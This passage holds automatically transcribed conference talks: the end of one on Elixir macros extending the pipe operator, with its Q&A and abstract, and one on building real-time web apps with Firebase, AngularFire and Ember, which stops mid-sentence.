we're actually going to delay execution of everything inside the quote, right? So in Norway you've got big boats, I like cruise ships. So when you see quote and unquote, think about it as, you know, sometimes you need to get across the cruise ship and you might not have access to all of the core corridor, right? So you have to come up one level or go down one level, right? To get to the other side of the cruise ship. So you need to think about when you're climbing up and when you're climbing back down, right? So level one would be like the code that's being executed at compile time. Level two would be the code that we're using where we're delaying the execution. So in this case, level two is the code that we're actually dropping into the macro. And everything inside the end quote, the unquotes, we're basically executing at executing earlier. So basically our pipe matching, our pipe matching is using another construct that you haven't seen yet, we haven't written yet called pipe while. That pipe while is going to take a different API. So let's take a look at that pipe while. So the pipe while is going to take a test which is going to, which is an expression that will return or true or false. And then it's going to take the pipe segments. And basically it's going to pipe while that test function is true, right? So that first function looks a lot like the, looks a lot like our pipe matching except for rather than executing the match, we're going to, we're actually going to call, we're going to reduce the pipes if our test is true, right? We want to call the next pipe in the segment if the test is true. Okay? So here's what that reduced looks like. So remember we're going to look at this in levels, what code are we actually going to include in the compiled source tree. And that looks like this. So what I'm doing is I'm looking at everything between the quotes. And the code between the quotes, I'm, I'm basically grabbing an accumulator which is all the pipes that have been executed so far. Right? And I could, I could wrap those, I could wrap this in the, in the source tree as unquote accumulator. But if you see, I actually use that accumulator twice, once in the true statement and once in the false statement. And I don't want to execute this code twice, right? You don't want to, since we have side effects, executing these, this twice would be a bad idea. So I actually, I actually grabbed the accumulator and then I have a simple case, could have been, could have been if then else. And if the test is true, I want to go ahead and unquote the next segment in the pipes. And if the test is false, just return everything that I've computed so far. Right? Because we're going to basically end execution right there. So, and if you want to look at, if you want to look at the outside of the compile statement, so that's everything inside the, inside the unquotes. That's, this is the stuff that we're actually going to execute initially. And when you put it all together, I get an execution that looks like this. So everybody with me so far. So this is actually a pretty cool metaphor because along the way, I've, I've included two things. The first one is pipe matching. So now I can pipe without exceptions, I can pipe as long as any kind of return code which I can match with a wall card is true. And I also get pipe if so I can match anything that, that, that, that meets the test in a function that I can call against my accumulator as long as that thing is true. Right? That gives me a lot of extra power that go way beyond what the initial pipes do. Right? So pipes work great until you get into production and then you have to start doing something beside happy path. Okay. So the last one I want to talk about is pipe width. It's a little bit more complicated but not too much. And the idea is that maybe I want to wrap each individual element of my pipe in some arbitrary function. Right? There are a number of places that you might want to do so. One is I might have, have exceptions that are not uniform. Sometimes they might return a return code, a narrow return code as they would in a typical Erlang library and sometimes they might throw an exception. What if I want to normalize that into a single API? Well, I can do this with a simple wrapping function. So in this case, maybe I have, if you look down at the bang code there. So in the bang code, I want to basically print that something bad has happened and I want to raise an exception. Right? And then the program looks the same. So start, click, click, bang and click. Right? Okay. So the whole problem with this code is that exception. That means that we can't treat things in a uniform way anymore. Right? I'd like to wrap that so I get a nice neat return code rather than having to deal with an exception and a narrow return code. Okay? So our solution is to build a wrapper. And you can see this wrapper, all it does is if I, if I get an error condition, then I basically return that error condition. Right? Or if I get an exception, if I capture an exception, then I return an error condition. And if I get an exception, I just return whatever's in the accumulator so far. Right? Exactly what you'd expect the pipe code to do. Which is great except if I had to wrap this individually around each pipe thing, then the application would be ugly. And instead, I'd like to keep the same original intent of the start, click, bang, click. Right? So this is the program I want to write. But you can see that the pipe, the pipe expression starts with pipe width. Right? Now passing it my function that wraps each element in the way that this execution is going to look, we're basically, oh, the way that this is going to look is basically going to wrap each individual roulette function with our exception wrapper. So it's not just about exceptions, maybe I'm doing something with matrix math. Right? So that I have, so that I have a couple of functions, maybe I want to operate over a list like this. And I want to do the same math on every element of the list. So wouldn't it be great if I could start with that matrix and then pipe that into plus one and pipe that into times two and get a result that did that with the math done on all those elements. Right? So essentially what I'm doing is taking every arbitrary function in the pipe list and wrapping it with another function. But I'm not doing this by writing extra code, by making all the consumers of my API write a lot of extra code, I'm doing this by changing the pipe operator itself. So that my clients can do this. So the magic is just a little bit more complicated than what we've done so far, but not too much. So in this case, I'm creating the macro called pipe with, and this looks exactly like the first couple, except instead of reduce if, I'm using reduce with. Right? So that's an anonymous function. So I'm taking as the first argument the function that I'm wrapping. Right? And the second, and the second argument is the pipe segments. So, and then I'm going to call reduce and reduce takes a couple of arguments. First is some collection, in this case, our list of pipe segments. And the second function is the one that you're going to map onto all the other functions. Right? So in this case, I'm just going to pass it a simple reduce. Right? And this is what my reduce looks like. My reduce with statement looks like. So basically I'm taking a single pipe segment, the execution so far, in my, the function that I'm wrapping around it. Okay, that's the outer function, that G function that I was wrapping around the F1 and the F2. Right? So let's look at the code at basically the template that I'm creating. And again, this is the code that's going to be substituted at compile time. And so here I'm saying the inner function is an anonymous function. And I'm going to wrap the outer quote, outer function around the inner function. So you see that, that bottom outer, that's the outer function. And then I'm going to call that with the accumulator and the inner function. That's it. So now, if I am doing some matrix math, so I have a, I have a little matrix, a little merge, a merge list, a merge list that basically takes one element and does and calls the function on all the elements in the matrix. And then when it's time to pipe those, I'm going to do my math with pipe with, right? So if I'm working with a list, I just merge a list. And if I'm working with a matrix, I just merge lists, which are two elements deep. And I could probably make this more generalized, but you get the idea. So now I've essentially created a list of all the elements that I'm working with. And I'm going to do a list of all the elements that I'm working with. But you get the idea. So now I've essentially, by building this, I've built a domain specific language that can work with individual numbers, with lists, or matrices, just by changing the pipe operator. Now this is probably not something that I would give every developer in my organization. But if I'm building a statistics library, it would be great to have a core team that built some of the matrix operators and have business users applying these operators to the matrices. Very powerful technique. So I realize that I'm going to be very early so far. I'm going to stop and pause for questions so far. Yeah. So I'm going to stop and pause for questions so far. Yeah. Okay. Slash two basically means that this is a function that has two arguments. That's all. Right? So basically since Elexer auto exports everything, and since in Erlang, every function that I'm working with is a function that has two arguments. So I'm going to start with a function that has two arguments. So I'm going to start with a function that exports everything. And since in Erlang, every function has an arity with it. There may be, for example, there may be a, in this case, there could be a matrix merge list one and a merge list two, which are different functions. Yeah. Other questions? Okay. So I'm going to start with a function that has two arguments. Okay. So basically the overall concept that I want to get across is not that everybody should run home, find a language, find macros, and start cranking out macros. Right? The stuff is tough and it's terse, but it's metaprogramming. Right? The concept that I'm trying to get across is that when you have, when you have a language, and the language is not powerful enough to handle the idioms that your organization needs to throw at it, then macros are a game changer. Right? And the idea that you can combine the idea, that you can combine two concepts of a very rich syntax and macros based on a uniform syntax tree is pretty interesting. It's a novel and it's a pretty new concept. Right? So in general, programming is about thinking and pipes help us think and macros can extend the concepts of pipes. Okay. Let's take more questions. Should we go back and look at any of the earlier examples or what guys, what would you guys like to see? Say again? Say it one more time. I'm not here. Oh, the unquote, yes. Yeah, so basically what happens is whenever you say quote, you're basically stepping back a level and you're saying rather than evaluating this code, enter the text, enter the text, enter the text, enter the text, enter the text, so this is text, right? So when you say unquote, you're saying, okay, now, except this part, I want this part to be actually evaluated now, to be compiled now. Yes, yes. So the question is if you have something like side effects and quotes, would you use a variable something like that? If you remember, I had a situation exactly like that where Yes, yes, yes. Yes. So basically the rules are the same as, I mean, you could, I think there are some things that are going to be accessible to macros and some things that aren't. The rules are not as close as you would think, right? So I saw a demonstration by a guy that I mentioned earlier in the talk, his name is Chris McCord, and he actually did his Unicode substitutions based on hitting an HTTP source that pulled down the actual Unicode from an authority and then did the translation at that time, right, in the macro, right, which is pretty cool. So the lines aren't as hard as you would think they are. Now that's not something I would do in my application, right, because I want to compile time to be compile time. I don't want my tests to behave in a certain way and so forth. Basically what we're doing is we're compiling in different steps, right? So delaying execution in this case, so this is actually, we're not actually going to, in this case I have AC equals Unquote accumulator, basically I'm delaying the compilation of that expression at that time, right? So I'm actually, no, I'm actually delaying the compilation of everything that's in, I'm delaying this compilation until later in the compile process, right? The execution will still happen at runtime, right? And this code I'm actually, I'm compiling now, I'm managing the expression now. Does that make sense? More questions? Yeah. It's always very difficult. It's always very difficult. So did you, did you, did you by any chance sit through the detox this morning? So basically what he said was, and these are the tools for debugging the, the, the, the, the generate code, he said, but they're not very good and it's hard. I went to an F-Sharp session yesterday and he talked about macros and he said, well debugging these is hard and you know, so on and so forth, right? So there's a guy named Stu Halloway and Stu Halloway is one of the most influential people in the closure community and he has a book on closure and he has a chapter on macros, one of the best chapters on macros I've ever seen and he, he quotes on the movie Fight Club. He says the first rule about macros is don't use macros, right? But if you do, this is what I know. Yeah, I was thinking, are there some good guidance on when to use them? Because they are obviously extremely powerful. Yes. Seems like it can be very obscure behavior to come back to on the book later. Yes. Yes. And, and that is the issue, right? So that is the issue. So basically, the alternative to macros is to build a language where you can't deal with, with these kinds of paradigms in this way. So you wind up using other paradigms like the cut and paste keys, right? And if the alternative to cut and paste maybe some 600, 700 times in your code base is a macro, a good example is Ruby on Rails has the same concept with open classes. And so rather than code all the database interfaces between, you know, when it has many relationships there are some, you know, 16 methods that you have to code up to manage that relationship fully. I type has many colon people. Department has many colon people and I'm done, right? That to me is a good, is a good usage of a macro. It does a couple of things. First it encapsulates domain logic that the language could know nothing about, right? And second, it dries up my code an awful lot. And third, it's something that I can't do with the basic language as it, as it is, right? So, you know, I use some, some combination of those rules to think about macros. But, you know, you're feeling uneasy right now and you should be feeling uneasy right now, but you, I mean, so if you take two things out of the talk, you should take these two. The first one is that macros are game changers for language, right? They can allow you to use constructs which become absolutely useless in production, right? So, if I had, for example, a typical Erlang library, half would be throwing exceptions, half would be returning a narrative, I can't pipe anymore. And that's dramatically different when I'm talking about piping and code readability than not, right? And if this enables that, that's a powerful thing and that's, that's a feature that the language didn't have before without macros. And the second thing is that while this stuff is possible and while it's easier and cleaner in, in languages that do macros in this way, it's difficult, right? And like you say, there are some tools that can help you in the debugging process. You know, there's a, there's a two-path debugger and elixir. It's still very difficult, right? Because some of these things, some of these macros are used to build the language itself, right? So, great question. I wish I had a better answer for you, but you asked, should I be scared? I said, yeah. And you asked kind of, is this important? And I said, yeah. More questions. Yeah. So to me, this feels very much like the maybe monad. Could you expand your macroset hopes to do monads in general? Yeah, so basically the question is, this looks a lot like the maybe monad in Haskell. And for those of you who don't code Haskell, one of the problems with traditional languages like many of the people, many of them that we use and probably in this room, is that the types don't convey enough information. For example, in my language Ruby, I have a string, the string might be empty, the string might be null, the string might have content, right? And so I find myself coding special cases a lot when, in fact, many strings might not be, I might not want to ever be blank, and many strings may return a string or something else. And if it does return something else, I want my compiler to tell me that I have to deal with that scenario. Did I capture your question right? And this allows me to deal with some of those scenarios in a more obscure way, right? So the problem with this language is it isn't as rich as Haskell. The type system isn't as rich. And the type system isn't as rich. With macros, it doesn't have to be. So I can make those kinds of value judgments on whether I want to do, whether I want to do all of the baggage that comes with a rich type system. Now, I say the word baggage, and lest I get all this, a lot of hate mail, I'm writing a book now called Seven More Languages in Seven Weeks based on the book I wrote three years ago. And every one of the seven and seven books tells a story. The story that we were telling in the last book was that functional languages are coming. I don't know what the winner is going to be. You better start paying attention. Well, the message for this set of books is that we are starting to refine what it means to be an effective functional language. And one of the things that's happening is the pendulum is swinging back toward stronger type languages. So, you know, we're covering, we looked at ACTA, we didn't do that, but we're doing Idris, which has dependent types. And we're doing Elm, which is strongly typed, which is basically salvation. If you guys are worried about call back hell on the browser, check out Elm. It's absolutely stunning. But the problem with Monads is that they are not accessible to the common man. I know I butchered a chapter with Monads in my last book, but one of the things that Elm in some places elixir does is it encapsulates the ideas behind Monads in a much more accessible way, I think. And, you know, it's because we've had time to think about these things and get them right. So, that's an ineffective way of saying, I don't know. More questions. Thank you so much. Thank you so much. Resources. There. Thank you. It's a complex talk, I think. What's up? What's up? What's up? What's up? What's up? What's up?
Elixir pipes have captured the imagination of the Elixir community. Joe Armstrong's first blog about the language, Dave Thomas's book title for Programming Elixir, and the creator of the language have all mentioned pipes as a core feature for understanding not just Elixir, but also how functional transformation works. In this talk, we'll learn to use macros to push pipes harder than you ever thought possible. Elixir programmers will learn to write prettier code, and others will learn why functional programming and macros are such a big deal.
10.5446/50587 (DOI)
So, now I think it's time to get started. Thank you all for coming. I know it's tough to get people to come to each individual talk because there's a lot of awesome talks going on at the moment. So, I'm glad to see you guys here. As you hopefully know, the topic is kind of my look at cloud beyond scaling and some of the stuff that you can do utilizing the cloud beyond some of the stuff that you've probably already heard a thousand times by now. So, this is me, just a short introduction. My name is Christian and I'm a Danish developer and I've been for nine and a half years by now, mostly working in.NET with web development and, well, for most of the time doing e-commerce sites but also working along with BI consultants and so on and doing some stuff in that space. The agenda for today is that, first of all, I'm just going to talk a bit about what I mean with this whole beyond scaling thing and then I'll talk a bit about real time on the web and kind of what that means in the scope of this talk. Then I'll give a short introduction to Firebase and then look at some of the ways that you can work with Firebase along with some of the frameworks that you might already know. So, covering a little bit of Angular, then showing how it wires up with Firebase, doing the same thing with Denver as well. And then finally, we'll look at some use cases that you guys can hopefully have for technologies along these lines. Well, starting out just so you get the whole story, I used to work at a company where we like probably a lot of you, we're starting to move to the cloud and being a.NET shop that meant moving to Azure. And that was kind of what we were doing with all of our new projects and also with some older projects that were kind of, you know, in a state where it was possible at the time, I would say. And the basic idea starting out was, as you've probably heard a million times at different talks about scalability, elasticity, about how you could outsource hosting and get fast provisioning, which is all very awesome. But at some point, we also got to talking if there was more business value to get from this. Not that I'm in any way, you know, not thinking that the cloud in and by itself provides a lot of value, but we just felt like there was more to get out of this whole switch. And one of the places we started looking was in these back end as a service in that space, you could say, of cloud technologies. And kind of some of the things that were resonating with us was the idea of for some types of projects being able to do some kind of rapid development and also combining different clouds, not just being with Azure, but also seeing what others could provide in the same space. It was also about kind of not having to see stick with either Windows or Linux, but being able to use the best tools out there no matter where they ran. And also, to some extent, getting beyond having to work with people because of their favorite programming language. Why should that matter? If the domain is interesting enough, if whoever you're working with knows enough about a certain domain, they should be the people to work with, not just because they are C sharp developers, Java developers, or whatnot. So, yeah, that was kind of some of the initial thoughts in this. And of course, still being a.NET shop, we started looking at Azure mobile services, which is definitely interesting in and by itself. But it's also very much the straightforward use case, you might say, for back and forth service systems. Because it provides you some way of working with data that is simple, provides you with authentication and push notifications and some kind of services for recurring jobs, which was pretty much the same types of applications that we were already building. So, it certainly has its use cases, but again, we were looking to do something a bit different. So, we stumbled on knowbackin.org. I don't know if you guys know this site at all. But it covers some of the different platforms out there. And, yeah, we had a look across some of these and found that there were actually some really interesting ideas amongst those that could also enable us to do new types of applications. One of the things that we, that kind of caught our interest was being able to work with real time data. At the time, I was working a lot with BI people and making sure basically that companies were allowed to see their data real time and kind of navigate their company based on that data. So, it needed to be as current as at all possible. And just going back a few years, really talking about real time on the web, that was more or less about refreshing the browser each X number of seconds, right? So, we didn't really have anything to do in that space. Of course, the natural thing for us, again, being a.NET shop, we did look at SignalR, which is really awesome in the space and in doing real time collaboration and in working with web sockets. And it's fairly easy to get started with. This is pretty much all that you need on the server side that you inherit from a hub and then you implement your messages and then through Dynamics, you get the ability to call your clients and broadcast messages and so on. And at the same time, on the client side, you can connect to this hub called the same messages and of course, react to messages coming back as you see here. And even though that's all nice and well, then it does take quite a bit of plumbing in for some of the cases that we were looking at, really, because you still need some way of hooking up a back end and working with your models and doing all the stuff that we're used to. And that was when we stumbled on Firebase. Has any of you heard or used Firebase before? So I only see one hand. That's not a whole lot. But yeah, that's awesome because I am going to pretty much take you into the bottom level of this. But yeah, the whole idea of Firebase is to give you a really easy way to work with data real time. So the basic concept is that if you think of everything in the database as being an endpoint that has a URL and everything being structured in kind of the same matter as a JSON document, then in that regard, it is very similar to a lot of other databases that you've probably heard of. But that is pretty much where the comparison ends. Because when you start working with it, instead of just querying a node or doing some type of query like you're used to, then the idea is that you subscribe to some node in this model that you're working against. And then when changes are done to the model, you get, you have an event that is fired and you can react to these changes. So basically, doing all this is extremely simple, which was one of the first pleasant surprises I had looking at this. Because really, what you see on the screen is all you need to know of the API to get really, really, really far. So basically, you have a couple of ways of putting data in. In this case, I'm sticking with the JavaScript edition of the API. They are in other flavors as well. But basically, you have a way of setting data. You can set it with a priority, which is pretty much specifying the index so you can sort things if it's an array you're working with. And you can push data, which is kind of just creates a reference and then you can optionally pass that a value as well. So it's just a way of making it easier to deal with lists. And then you also have some querying capabilities that you can say that you only want our item starting at a certain priority and you can limit it to a certain priority. And then basically, the most important thing of it all is that like a lot of other APIs, you have this on method that allows you to subscribe to different events. And all the event types are the ones that are listed at the bottom. So basically, the value event is always called when you hook up to the database. So it gives you the entire data object that you're referencing. And then you can listen to when children are added or changed or removed or just moved around the structure. And in those cases, you'll get a snapshot back instead of the entire thing. And also, when you get started, the documentation is actually pretty good. They have some really nice examples and some quick starts. So I was fairly surprised that it didn't take more than five, ten minutes then I had the first thing running and was actually able to start thinking about the problem that I was actually trying to solve, you know, the business problem. And of course, actually, I left this slide out the other times that I've been doing the talk because I have no association with Firebase as such. So I didn't want to, you know, get too much into the whole sales thing but people have kept asking. So I just put in this slide just to give you some idea of what it costs to get started. And basically, you know, I think this is fairly cheap and is definitely affordable for most types of products and especially in comparison to other databases. Kind of in the same category, just to give you a little bit of a look behind the scenes, then the technology is used to build Firebase or Scala and Netty and then JavaScript and Node.js. So it tells you quite a bit about it all being, about being reactive and about building a reactive framework, which is what it is. As I shortly mentioned earlier, then there are quite a few APIs for working with Firebase. So no matter where you're coming from, I would think you have some option of working with it. The big obvious thing, of course, is web development and doing this in JavaScript. Along the same lines, you would have an option of doing a server side with Node.js. They also have an API for iOS and OS X, Java and Android. And then if all else fails, there is the REST API, which is still really, really simple to use. So it shouldn't be a stumbling block to anybody, but of course, we all like to see the API and the language that we're proficient in, right? So and actually after I started speaking about this subject, I got in touch with a couple of people at Firebase and they told me that.NET is actually on the roadmap. So it's also coming to my own platform eventually. And well, actually, just while I remember to say so, that again, even though I'm not associated with Firebase, they were kind enough to send me a bunch of stickers. So if you guys want some swag afterwards, I have them up here with me on stage, which they were kind enough to allow me to do. So getting back to the coding part of this, as I mentioned before, then working with Firebase is pretty much a matter of signing up. Then you get a URL that you are appointed to. And then you can create a Firebase reference and then set values on it. And of course, listen to all of these events. So listening to the value event that will always be called and then the child added, child changed events and so on. It's no more work than what you see here. And with regards to transactions, which is probably an obvious question that some of you will have, then the general idea is that they try to run your changes locally right away. Then it tries to commit it to the Firebase servers. And of course, if that is successful, then the call bag is called. And if there's a conflict, then the client will receive the new value and the transaction will be rerun. This is working fine for at least all of the cases I've been using it for. And as a kind of a side note, they started also providing their own hosting platform quite recently, actually. So I'm not even using it for my demos, even though I've been looking at it shortly. But Firebase hosting is basically a way of getting all your static files served. So it gives you a way of serving them via HTTPS. And then you get a CDN and you can choose your own custom domains and so on and use it with no tooling. So it is extremely simple. And I would actually bet that quite a few applications will only need static pages because you'll just be serving some of the JavaScript that you'll be writing and then a bunch of HTML and CSS pages. So this is really, really kind of a lean way to get started without the hassle of a vast platform when you're not in need of such a thing. Well, when just going back to the story that I went through, then when we started looking at these things, the shop always coming from was at the same time moving from working with WPF and wanting to do more web development. And it kind of makes sense in this day and age because we want to target every platform out there. And as of today, still the only way to truly write once and run everywhere is still writing a web application. And for a lot of our customers, we didn't really need native support. But one of the concerns that a lot of people who had been working with WPF for a long time had was that they would kind of miss out on two-way bindings. A lot of these people have been working with the earlier frameworks where they didn't have two-way bindings and they thought it was a pain always having to kind of write your code twice mirrored, if you could say that way. So they were really kind of afraid of going back to that. And it was actually a kind of something that we had to take into account when switching to the web. And first of them, when you're looking at two-way bindings on the web, then there's kind of two ways of going about this that the framework out there used today. One of them is wrapping each of your properties so that when you, instead of calling the property directly, you call a method. And then that will make sure that it is, well, it uses some published subscribe mechanism to make sure that your changes are propagated. And the other way around is to watch your model for changes. And in that way, you can avoid having to wrap your objects and that way change that things go from being properties to being methods and that you have to do this whole conversion every time you pull data from the server, which, again, depending on what you're building in some cases might actually be a bit of a nuisance. But, yeah, Angular does the latter and frameworks like Ember, for instance, which we'll also be looking at, does more of a wrapping kind of thing. So, yeah, we ended up going with Angular after having looked at this space for quite a while. Basically, part of the reason for that choice was that it was really starting to take off. It was nice to have a platform that we knew was backed by a fairly big company, so we felt fairly safe that it wasn't going away. And even though a lot of people said at the time that we didn't really have any winners yet with regards to which platform people were going to choose for doing single-page applications, then we were starting to see a trend, as you can see on that slide. And actually, later on, I've become even more confident that a lot of good stuff will still happen with Angular as Rob Eisenberg lately joined the team to implement some of his good ideas from Gerendl into Angular as well. So, yeah, I still think it's a good platform if you want to use a framework and just for now keeping me out of the whole discussion of whether you want a framework or not. But in that case, it is a good way to go. And, yeah, how many of you have worked with Angular or Jace? Okay, fair amount of you. So, basically, this is just to get everybody on board, and this is pretty much the simplest thing that you can do in Angular. And as you can see, this just has a placeholder where I can put a name in my template, which is kind of marked with having this controller, which defines a certain scope that we are working within, that our model will be contained within. And then, you'll have to declare that controller in code as well. The simplest way of doing that is just having a function that is named accordingly. And then, through dependency injection, you can kind of acquire different things that you want to use from the Angular framework. With the basic thing, you'll pretty much always be needing being a scope, which is where all your, well, functions and all if your model will be bound to. So, in this case, I just set your name that I was displaying in the template to my name. And then, I add a function that allows me to show what is in that and then add that through what is called a directive, which is ngClick, which wires all that up. So, I'll be able to call that function when pressing a button. And getting in a little bit deeper with this, the way that this works in AngularJS and the reason that it's actually so simple to work with and that you don't have to do anything yourself out of the box to work with this is that they have this watch applied by just Cycle. And, yeah, basically, you can also access this yourselves. And the idea is that you watch some part of the model, some property. And you can either do that by specifying the name of the property or by a function, which just returns that value from the scope and then passing in a handler for what you want done afterwards. And then, you can apply changes to a model in kind of the opposite way if you would call that, that you can also pass it this kind of expression or you can pass it a function that you want to apply. And this all allows Angular to keep track of what changes are made to the model and then doing its magic behind the scenes. And it does this through what is called a digest cycle. So, basically you can call this digest method yourselves and but I pretty much took it in here for completeness sake because as with a garbage collection in.NET or things like that, it's not normally something you would call yourself. It just goes on behind the scenes. And then, building on that and then once we had that kind of knowledge build up in-house, we were starting to look at Angular Fire because we wanted to use last Firebase and even though it's already fairly simple to work with, we must well look at these kinds of plugins that makes it really, really, truly. The basic idea is that you go from having this two-way binding to actually having three-way binding. So, now you can bind from your view to your model that you're working with to a database. And essentially, what that gives you is a real-time application, right? Because if I make a change in my browser and that is propagated to the database and the database make sure that it's propagated to all the clients, then we're done. Then we can all be working on the same model in real-time and collaborating. And it's, yeah, to me it was just, you know, astounding how simple this really is that we're all used to working with two-way binding and pretty much just add a concept of binding this model to a database and now we have brand new capabilities that we weren't able to work with before, really. Once you get started with Angular Fire, they also have a pretty good documentation by now and also some really good examples. Again, getting up and running with this is a matter of minutes, so I really encourage you to try it out yourselves and just give it a go. But I also want us to try it out right now if you guys are up for it. So, yeah, just short run-through of the code. This is a little deeper than the Angular stuff we did before because in this case, I first off declare a module, then I import this Firebase module as well that I need to use, then I set up my controller much like I did before. This is just the real way of doing things because if you just write a function, then when it gets minified, then the variable names change and then your dependency injection goes out the window. So, this is basically what you do working with Angular. And then you can get your scope injected as before, but you can also get this Firebase thing. And once you have that, then you can create your Firebase reference and then you can write a function that just adds a method for, yeah, for adding messages in this case. So, again, really, really simple and especially for you who have been working with Angular, this is pretty much what you're already doing with just a line or two of wire up and then you get a real-time application. So, if you guys feel like it, I would like you to try out the application that you just saw. I just put it on that URL. So, you guys should be able to see what you are writing. And...whoa. Whoops. And here you actually see the Firebase database and you see your messages rolling in as things change. If you notice, then when they roll in, then they light up so you can see which things are, yeah, being added and if things were being deleted and so on. So, you can kind of see what's going on with the database at all times. And this view is just an implementation like the one you saw before, just displaying the raw data. So, again, really simple way of using this whole conceptual model of working with real-time data. And, yeah, for those of you not holding a phone, this is what it looks like. So, this is where we came from. And even though, as I mentioned before, I didn't end up going with Ember, then I still thought it was a significant point to show you guys that this works equally well with Ember. So, you shouldn't, you know, kind of let yourself deter if you have a different framework that you're like. Actually, I recently saw that they are doing stuff with React as well, which is also looking to become really nice and really easy to work with. Yeah. Even though not being too knowledgeable about Ember myself, I'll just give a short introduction to the concepts that we need in this case. First of all, then templating is done using handlebars. So, where Angular is trying to be very much self-contained, then Ember has a philosophy of using existing frameworks, which mostly means using handlebars and jQuery. And then the more essential thing, and one of the core concepts of Ember is working with routing. That is basically how you structure your application when you're starting out. So, as you see here, first of all, you create an application and then you can map to certain paths and then you can set up a model that you're working with on that specific route. And the whole modeling part is quite extensible in Ember and kind of allows you to define your whole model, which types of properties you're working with and so on. And that is actually what is allowing it to collaborate with Firebase as well in the way that we'll see. So, the Ember framework was introduced a little later than the one for Angular, but I think it is starting to get on par, especially because since then both of them have kind of been taking under the wing by Firebase themselves. So, they have references from their main site and they also made sure that the API is aligned more than they did first off. So, right now if you've been working with one of them, you're actually fairly easy to get started with the other one as well. And I think it's really nice that they're kind of taking this entire view of kind of the market of working with single-page applications and giving you different options. And yeah, as you see, the documentation looks pretty much like what you saw before and they also have really nice examples to get you started if this is your speed. Basically, what you're doing in code is that you create this application and then what you need to do to plug in Firebase is that you use this Firebase adapter, which is just a way in Ember to attach an adapter to your model so it can do more than just being in memory model. In this case, that makes sure it's wired up to Firebase. And then for some of the more advanced stuff when dealing with modeling, you'll need an application serializer as well, which is also just in the package. So, you'll just add that as well. And that is all that you need to do. So, again, this shows you how it works in its entirety. So you do the stuff that just went over as you see at the top. Then you declare your model. In this case, like before, I have a sender of the message, which is from an text. And then I define my route with this type of model. And then I declare a controller for it. And I implement the action that I need, which is, again, to be able to send a message. And then I just work with the Ember.data stuff as you normally would. And then, of course, make sure to save at the end. Actually, you made the same sample if you guys want to try it out at this URL. It should look pretty much like the one you saw before. But, as you can see here. Whoa. And, of course, these chat examples are pretty much just to give you an idea of how this works because you could be doing something a lot more creative than a simple chat application. But really what I want to give you when you leave here is just the confidence to try this out and see how extremely simple it is to get started. And if you're passing chat messages or whatever data structure, it really doesn't change much. It's pretty much stays simple and easy to do. So just to do a bit of a comparison of the two frameworks, then as you can see from this list, a lot of the differences really come down to the differences of the underlying single-page application framework. But, yeah, now both are officially supported. And the data models align pretty well after the late changes that they have made. And then it's a matter of if you like working with a system that supports the watching or the wrapping version of working with two-way bindings. And then, of course, there's a matter of size and learning curve. Ember is quite more extensive to get started with. And I would argue that the learning curve is quite a bit steeper for most people coming into this. And then, of course, conceptually, they are different because it's, there's a difference between working with controllers and routes right off the gate and then, or, and scopes right off the gate or working with routes and models as you saw in the samples before. Yeah, and then there's the matter of it being self-contained versus having dependencies on other frameworks, which in both cases has its ups and downs, right? And in the end, both will definitely get you where you need to go. It's just a matter of how you like to get there. And kind of in overview of all of this, then, of course, these types of services, of back-end as a service providers give you will never be a one-size-fits-all. So I'm not trying to advocate that no matter what you are building, you should be doing this or that you should use it as your main store or anything along those lines. But there are quite a few awesome use cases that you probably weren't able to build just a few years ago. And at least if you were, then it would probably be hard to find somebody who would be willing to fund it because it would be quite a bit of work to get running as smoothly as you can today. So yeah, use cases. I've kind of divided that into two overall, just to kind of spur some ideas and hopefully, and probably you guys have better ideas than I do. So I'm just trying to juggle your minds a little bit. But yeah, the obvious use case as we already saw was doing chatting in social media and stuff like that. But also when working with sharing data in everyday life, it would be useful to be able to work with grocery lists, anything where you're collaborating with either the missus at home or with colleagues or what it might be. Then it's obvious that you want to do this real time and not have to update your application all the time to see if new changes run in if you're actually doing stuff at the same time. Also for teaching tools, you see a lot of places that people to a higher extent try to get taught from home or at least not on premise. Then there might be some awesome situations where you could use it for gaming, of course. And then being a huge sports guy myself, then I'm hoping that some of the betting companies will actually pick up on this as well because they tend to have these platforms where you can live bet and you still end up having a page that is just refreshed and refreshed and refreshed. And this could be done a lot more elegantly, this type of tool. And then of course, focusing more on business type applications. And what I've been using it for actually has been working with actionable data making sure that business decisions are available in real time on dashboards and stuff like that. That includes of course listening to analytics data and pushing that out using a system like this. And then, yeah, building graphs, dashboards, and again, collaboration tools and of course doing customer support has suddenly become quite easy because you could do, well, something that would start out as a chat application but basically extended with whatever data you need to provide for your customers to provide the best type of service. And again, it would be fairly straight simple to do. Then I have one last demo. I want you guys to see if this will collaborate. And could use a little more space here. So, this is just a real quick sample that I put together because the actual platform that I was working on, I'm not allowed to just go around and show people, especially because some of the data on there is actually mission critical for that company. So I just made a really simple example where I'm working with a model in the same way that you saw before. But in this case, it displays data of car sales, completely something I made up. So don't mind the numbers too much. And, yeah, when the page loads, see data pop in and then I could add some other car. It could be a panda and some color I didn't use already. And then put in some values for this as well. And then once I click, things are updated real time. And of course, if more browsers had been on, they would update as well. And you need a bigger screen. The element I just added is added here at the bottom. And even if I go in this direction and choose to remove it again, then you'll see my data update instantly. And what this kind of also shows is that you'll still be able to work with one model and actually display the data in several kinds of ways. Of course, that is what they are already doing in the database. But in one of the things I've been working with, we were actually allowing people to, in one view of the page, have data in tables and work with that data and do updates and kind of, if they had some ideas of certain trades they might make, then we could do some calculations and push those out and people could actually be working on those projections and so on while sitting in different sense of the country and having a talk about this. And it all just flew between them in this nice and smooth fashion. Yeah. And, of course, you should see the code for this as well. And as you saw earlier, then this is still just expanding a little bit on the same concepts as before that we have a check controller. Then we have a repeater that looks at the cars which are in my model. And then I have something that can display a marker for the color that was picked on this thing. And then I have the two canvases that I can bind to. But, of course, these, the framework that I use to display the graphs isn't part of Angular or any of this. So it doesn't really know much about these bindings. And that's actually want to show you how to kind of get out of this. And this is just my two-way bound model for updating these values as you saw me use before. And then what I do is that I make this service that knows how to get the data for these bars. So it just does some conversion once I get it back from the database. Because in this case, the data model won't fit completely into what I'm doing. So I just implement a small service that will convert these things. And the same thing for getting the PI data. And then the actual thing of interest for all of this is that, again, wire up to Firebase. And I, in this case, use, as just so before, I explained the watch method of how you could react to changes being made on a model client side. And because this is not part of, because the graph tool doesn't know about these updates, then I need to do this that I watch the cars property. And when it changes, then I update my charts. So it's basically all the wire up that I need to do to plug something in that does not all know about these concepts, about this way of working with data, which I still think is pretty nice, pretty awesome. And then, of course, a function to save it all. So the takeaways that I hope you guys have from this talk is, well, first of all, to look at the cloud as more than hardware for rent and really look into some of these use cases. This is just one of them and one that I found interesting and that I've been using. But there are plenty of other platforms showing up that look interesting and give you some awesome capabilities without you having to do 